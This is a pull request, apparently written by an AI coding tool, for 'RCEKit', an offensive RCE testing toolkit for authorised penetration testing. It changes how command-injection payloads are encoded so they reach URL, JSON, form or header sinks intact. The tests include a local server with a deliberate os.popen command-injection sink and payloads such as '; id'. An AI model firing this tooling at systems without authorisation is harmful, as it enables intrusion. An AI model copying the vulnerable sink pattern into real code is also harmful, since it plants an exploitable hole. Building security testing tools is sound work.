### PR TITLE
Encode verification payloads per injection point

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 # RCEKit — RCE Testing Toolkit
 
-**Version 2.2.0** · MIT · Python 3.8+ · no third-party dependencies
+**Version 2.3.0** · MIT · Python 3.8+ · no third-party dependencies
 
 RCEKit is an offensive **RCE testing toolkit** for authorised penetration
 testing, red teaming, and security research. It covers the full loop, not just
@@ -76,6 +76,7 @@ and does not. Only run any of this against systems you are authorised to test.
 | `--oob-domain` | Collaborator/interactsh domain; each payload gets a unique subdomain token | None |
 | `--verify-url` | Authorised target URL with a `FUZZ` marker; fire and confirm execution | None |
 | `--verify-data` / `--verify-header` / `--verify-method` | Body (with `FUZZ`) / repeatable header / HTTP method | — |
+| `--verify-url-location` / `--verify-body-location` | How to encode the payload at the URL / body injection point | `query_value` / auto |
 | `--verify-delay` / `--verify-timeout` | Seconds between requests / per-request timeout | `0` / `8` |
 | `--verify-allow-destructive` | Let verification fire destructive payloads (persistence/backdoors); skipped by default | Off |
 | `--listen` + `--correlate <map.jsonl>` | Run the OOB listener and map callbacks to payloads | Off |
@@ -223,6 +224,23 @@ POST with `--verify-data`).
 python rcekit.py --acknowledge-consent \
   --environments unix --categories basic_enum file_operations waf_bypass \
   --verify-url "https://target.example/lookup?host=FUZZ"
+```
+
+The payload is encoded for the **injection point it lands in**, so it reaches the
+sink intact rather than being blanket URL-encoded. The URL marker is percent-
+encoded as a query value (`--verify-url-location url_path`/`raw` to change it),
+and the `--verify-data` marker is auto-detected from the `Content-Type`/body
+shape: a JSON body is JSON-escaped only (never percent-encoded, which would hand
+the sink a literal `%3B%20id`), an `x-www-form-urlencoded` body is form-encoded,
+anything else is sent verbatim. Override with `--verify-body-location
+json_string|form_value|raw`.
+
+```bash
+# JSON body: "; id" is delivered as-is inside the JSON string, not %3B%20id
+python rcekit.py --acknowledge-consent --environments unix --categories basic_enum \
+  --verify-url "https://target.example/api" --verify-method POST \
+  --verify-header "Content-Type: application/json" \
+  --verify-data '{"host": "FUZZ"}'
 ```
 
 ```

--- a/rcekit.py
+++ b/rcekit.py
@@ -26,7 +26,7 @@ logger = logging.getLogger(__name__)
 
 # Bump on every change: PATCH for fixes, MINOR for new capabilities, MAJOR for
 # breaking changes to the CLI, output formats, or template schema.
-__version__ = "2.2.1"
+__version__ = "2.3.0"
 
 SAFETY_ORDER = {"safe": 0, "intrusive": 1, "stateful": 2}
 
@@ -1150,6 +1150,79 @@ class RCEKit:
             f"{matcher}\n"
         )
 
+    # Injection-location encoders for live verification. Each turns the canonical
+    # payload (the exact bytes the sink must receive) into the on-the-wire form
+    # for one injection point, so the delivery layer never corrupts it:
+    #   * query_value / url_path — percent-encode; the server URL-decodes it back.
+    #   * form_value             — form percent-encode (x-www-form-urlencoded body).
+    #   * json_string            — JSON string escaping ONLY. A JSON body is not
+    #                              percent-decoded, so percent-encoding here would
+    #                              hand the sink the literal "%3B%20id" instead of
+    #                              "; id" and the oracle would never fire.
+    #   * header                 — keep the payload on one header line (strip CR/LF).
+    #   * raw                    — send verbatim (unknown/custom body).
+    _INJECTION_ENCODERS = {
+        "query_value": lambda p: urllib.parse.quote(p, safe=""),
+        "url_path": lambda p: urllib.parse.quote(p, safe="/"),
+        "form_value": lambda p: urllib.parse.quote_plus(p),
+        "json_string": lambda p: json.dumps(p)[1:-1],
+        "header": lambda p: p.replace("\r", " ").replace("\n", " "),
+        "raw": lambda p: p,
+    }
+
+    def _encode_for_location(self, payload: str, location: str) -> str:
+        encoder = self._INJECTION_ENCODERS.get(location)
+        if encoder is None:
+            raise ValueError(f"Unknown injection location: {location!r}")
+        return encoder(payload)
+
+    @staticmethod
+    def _content_type(headers: Optional[List[str]]) -> str:
+        for header in headers or []:
+            name, _, value = header.partition(":")
+            if name.strip().lower() == "content-type":
+                return value.strip().lower()
+        return ""
+
+    def _detect_body_location(self, data: Optional[str], headers: Optional[List[str]]) -> str:
+        """Pick the on-the-wire encoding for a payload injected into the request
+        body, from the Content-Type header first, then the body's own shape."""
+        ctype = self._content_type(headers)
+        if "json" in ctype:
+            return "json_string"
+        if "x-www-form-urlencoded" in ctype:
+            return "form_value"
+        stripped = (data or "").strip()
+        if stripped[:1] in "{[":
+            return "json_string"
+        if re.match(r"^[^\s=&]+=[^&]*(&[^\s=&]+=[^&]*)*$", stripped):
+            return "form_value"
+        return "raw"
+
+    def _build_verify_request(
+        self,
+        payload: str,
+        url: str,
+        data: Optional[str],
+        headers: Optional[List[str]],
+        url_location: str,
+        body_location: str,
+        mark: str = "FUZZ",
+    ) -> Tuple[str, Optional[bytes], Dict[str, str]]:
+        """Render one verification request, encoding the payload independently
+        for each injection point it lands in (URL / body / header). This replaces
+        the old blanket URL-encoding, which corrupted JSON bodies and
+        double-encoded already-encoded payloads."""
+        target = url.replace(mark, self._encode_for_location(payload, url_location))
+        body: Optional[bytes] = None
+        if data is not None:
+            body = data.replace(mark, self._encode_for_location(payload, body_location)).encode()
+        hdrs: Dict[str, str] = {"User-Agent": "rcekit-verify"}
+        for header in headers or []:
+            name, _, value = header.partition(":")
+            hdrs[name.strip()] = value.strip().replace(mark, self._encode_for_location(payload, "header"))
+        return target, body, hdrs
+
     def _evaluate_verify(self, record: PayloadRecord, status: Optional[int], body: str,
                          elapsed: float, baseline: float, margin: float = 2.0,
                          control_body: str = "", elapsed_confirm: Optional[float] = None) -> Tuple[str, str]:
@@ -1188,29 +1261,27 @@ class RCEKit:
     def run_verification(self, records: Iterator[PayloadRecord], url: str, method: str = "GET",
                          data: Optional[str] = None, headers: Optional[List[str]] = None,
                          delay: float = 0.0, timeout: float = 8.0,
-                         max_payloads: Optional[int] = None) -> List[Dict[str, Any]]:
+                         max_payloads: Optional[int] = None,
+                         url_location: str = "query_value",
+                         body_location: Optional[str] = None) -> List[Dict[str, Any]]:
         """Fire payloads at an AUTHORISED target and confirm execution via each
         payload's oracle (match regex / canary token / timing). The FUZZ marker in
-        the URL / data / headers is replaced with the payload.
+        the URL / data / headers is replaced with the payload, encoded for the
+        injection point it lands in: ``url_location`` for the URL, ``body_location``
+        for the request body (auto-detected from Content-Type/body shape when not
+        given), and single-line escaping for headers.
         """
         import time
         import urllib.request
         import urllib.error
 
-        MARK = "FUZZ"
-
-        def build(payload: str):
-            encoded = urllib.parse.quote(payload, safe="")
-            target = url.replace(MARK, encoded)
-            body = data.replace(MARK, encoded).encode() if data else None
-            hdrs: Dict[str, str] = {"User-Agent": "rcekit-verify"}
-            for header in headers or []:
-                name, _, value = header.partition(":")
-                hdrs[name.strip()] = value.strip().replace(MARK, payload)
-            return target, body, hdrs
+        resolved_body_location = body_location or self._detect_body_location(data, headers)
+        if data is not None:
+            logger.info("Verification body injected as '%s'", resolved_body_location)
 
         def fire(payload: str):
-            target, body, hdrs = build(payload)
+            target, body, hdrs = self._build_verify_request(
+                payload, url, data, headers, url_location, resolved_body_location)
             request = urllib.request.Request(target, data=body, headers=hdrs, method=method)
             start = time.time()
             try:
@@ -1458,6 +1529,14 @@ def main():
                         help="Seconds to wait between verification requests (rate limiting)")
     parser.add_argument("--verify-timeout", type=float, default=8.0,
                         help="Per-request timeout for verification (seconds)")
+    parser.add_argument("--verify-url-location", choices=["query_value", "url_path", "raw"], default="query_value",
+                        help="How to encode the payload where FUZZ appears in --verify-url "
+                             "(default query_value: percent-encoded, as a query parameter)")
+    parser.add_argument("--verify-body-location", choices=["json_string", "form_value", "raw"], default=None,
+                        help="How to encode the payload where FUZZ appears in --verify-data "
+                             "(default: auto-detected from Content-Type/body shape). json_string "
+                             "escapes for a JSON body WITHOUT percent-encoding; form_value percent-"
+                             "encodes for x-www-form-urlencoded; raw sends it verbatim")
     parser.add_argument("--verify-allow-destructive", action="store_true",
                         help="Allow --verify-url to fire destructive payloads (persistence/backdoors/etc.); off by default")
     parser.add_argument("--listen", action="store_true",
@@ -1631,6 +1710,7 @@ def main():
             records, url=args.verify_url, method=method, data=args.verify_data,
             headers=args.verify_header, delay=args.verify_delay, timeout=args.verify_timeout,
             max_payloads=args.max_payloads,
+            url_location=args.verify_url_location, body_location=args.verify_body_location,
         )
         by_verdict: Dict[str, int] = {}
         for result in results:

--- a/tests/test_generator.py
+++ b/tests/test_generator.py
@@ -818,6 +818,103 @@ class GeneratorTestCase(unittest.TestCase):
             server.shutdown()
             server.server_close()
 
+    def test_encode_for_location(self):
+        # Each injection point gets its own on-the-wire encoding.
+        self.assertEqual(self.gen._encode_for_location("; id", "query_value"), "%3B%20id")
+        self.assertEqual(self.gen._encode_for_location("; id", "url_path"), "%3B%20id")
+        self.assertEqual(self.gen._encode_for_location("; id", "form_value"), "%3B+id")
+        # A JSON string body is escaped only — never percent-encoded.
+        self.assertEqual(self.gen._encode_for_location("; id", "json_string"), "; id")
+        self.assertEqual(self.gen._encode_for_location('a"b\\c', "json_string"), 'a\\"b\\\\c')
+        # Headers stay on one line.
+        self.assertEqual(self.gen._encode_for_location("a\r\nb", "header"), "a  b")
+        self.assertEqual(self.gen._encode_for_location("; id", "raw"), "; id")
+        with self.assertRaises(ValueError):
+            self.gen._encode_for_location("x", "bogus")
+
+    def test_detect_body_location(self):
+        # Body shape drives the default...
+        self.assertEqual(self.gen._detect_body_location('{"host": "FUZZ"}', []), "json_string")
+        self.assertEqual(self.gen._detect_body_location('host=FUZZ&x=1', []), "form_value")
+        self.assertEqual(self.gen._detect_body_location('FUZZ', []), "raw")
+        # ...and an explicit Content-Type wins over the shape.
+        self.assertEqual(
+            self.gen._detect_body_location('FUZZ', ["Content-Type: application/json"]), "json_string")
+        self.assertEqual(
+            self.gen._detect_body_location('FUZZ', ["Content-Type: application/x-www-form-urlencoded"]),
+            "form_value")
+
+    def test_build_verify_request_encodes_per_injection_point(self):
+        # The URL marker is percent-encoded (server URL-decodes it back)...
+        target, body, hdrs = self.gen._build_verify_request(
+            "; id", url="http://t/?x=FUZZ", data=None, headers=None,
+            url_location="query_value", body_location="raw")
+        self.assertEqual(target, "http://t/?x=%3B%20id")
+        # ...while a JSON body is escaped, NOT percent-encoded: the old blanket
+        # URL-encoding handed the sink a literal "%3B%20id" and broke every JSON
+        # injection. Regression guard for that bug.
+        _, body, _ = self.gen._build_verify_request(
+            "; id", url="http://t/api", data='{"host": "FUZZ"}', headers=None,
+            url_location="query_value", body_location="json_string")
+        self.assertEqual(body, b'{"host": "; id"}')
+        self.assertNotIn(b"%3B", body)
+        # Headers carry the payload verbatim on a single line.
+        _, _, hdrs = self.gen._build_verify_request(
+            "; id", url="http://t/", data=None, headers=["X-Fuzz: FUZZ"],
+            url_location="query_value", body_location="raw")
+        self.assertEqual(hdrs["X-Fuzz"], "; id")
+
+    def test_verify_confirms_execution_in_json_body(self):
+        # End-to-end regression: a JSON-body command-injection sink must be
+        # confirmed. With the old blanket URL-encoding the sink received
+        # "%3B%20id" and nothing ever executed.
+        import http.server
+        import json as _json
+        import os
+        import socketserver
+        import threading
+
+        class Handler(http.server.BaseHTTPRequestHandler):
+            def log_message(self, *a):
+                pass
+
+            def do_POST(self):
+                length = int(self.headers.get("Content-Length", 0))
+                raw = self.rfile.read(length).decode(errors="replace")
+                try:
+                    host = _json.loads(raw).get("host", "")
+                except Exception:
+                    host = ""
+                pipe = os.popen("echo " + host + " 2>&1")  # command injection sink
+                out = pipe.read()
+                pipe.close()
+                self.send_response(200)
+                self.end_headers()
+                try:
+                    self.wfile.write(out.encode(errors="replace"))
+                except BrokenPipeError:
+                    pass
+
+        server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), Handler)
+        port = server.server_address[1]
+        threading.Thread(target=server.serve_forever, daemon=True).start()
+        try:
+            records = self.gen.generate_payload_records(
+                selected_categories=["basic_enum"], selected_environments=["unix"],
+                selected_contexts=["raw"], selected_encodings=["none"],
+            )
+            results = self.gen.run_verification(
+                records, url=f"http://127.0.0.1:{port}/api", method="POST",
+                data='{"host": "FUZZ"}',
+                headers=["Content-Type: application/json"],
+            )
+            confirmed = [r for r in results if r["verdict"] == "confirmed"]
+            self.assertTrue(confirmed, "a JSON-body RCE must be confirmed")
+            self.assertTrue(any(r["payload"] == "; id" for r in confirmed))
+        finally:
+            server.shutdown()
+            server.server_close()
+
 
 if __name__ == "__main__":
     unittest.main()


### PR DESCRIPTION
## Problem

`run_verification` blanket URL-encoded every payload for both the URL and the request body. As a result:

- A **JSON body** injection received a literal `%3B%20id` instead of `; id`, so the sink never saw the command and no oracle fired — a real RCE was reported as unconfirmed.
- An **already-encoded** payload (e.g. the `url_encode` variant) was double-encoded (`%3B` → `%253B`).
- Headers, by contrast, were sent raw, so encoding was inconsistent across injection points.

## Fix

Encode the payload for the **injection point it actually lands in**, via a new `_build_verify_request` that renders each request with per-location encoders:

| Location | Encoding |
|----------|----------|
| `query_value` / `url_path` | percent-encode (server URL-decodes it back) |
| `json_string` | JSON string escaping only — **never** percent-encoded |
| `form_value` | form encoding for `application/x-www-form-urlencoded` |
| `header` | keep the payload on a single line (strip CR/LF) |
| `raw` | verbatim |

The body encoding is auto-detected from the `Content-Type` header and body shape, and can be overridden with the new `--verify-url-location` / `--verify-body-location` flags. The URL query path keeps its previous behaviour, so existing query-parameter verification is unchanged.

## Tests

- Unit tests for the per-location encoders, body-location detection, and the request builder (including an explicit regression guard that a JSON body is no longer percent-encoded).
- An end-to-end test with a local JSON-body command-injection sink that must be `confirmed`.
- Full suite: 63/63 green, offline, no third-party dependencies.

## Versioning

Bumped to `2.3.0` (new CLI capability) and synced the README version badge (also resolving the prior README/code version mismatch).

---
_Generated by [Claude Code](https://claude.ai/code/session_013vVUUNtsiMzfdCKPouUjB6)_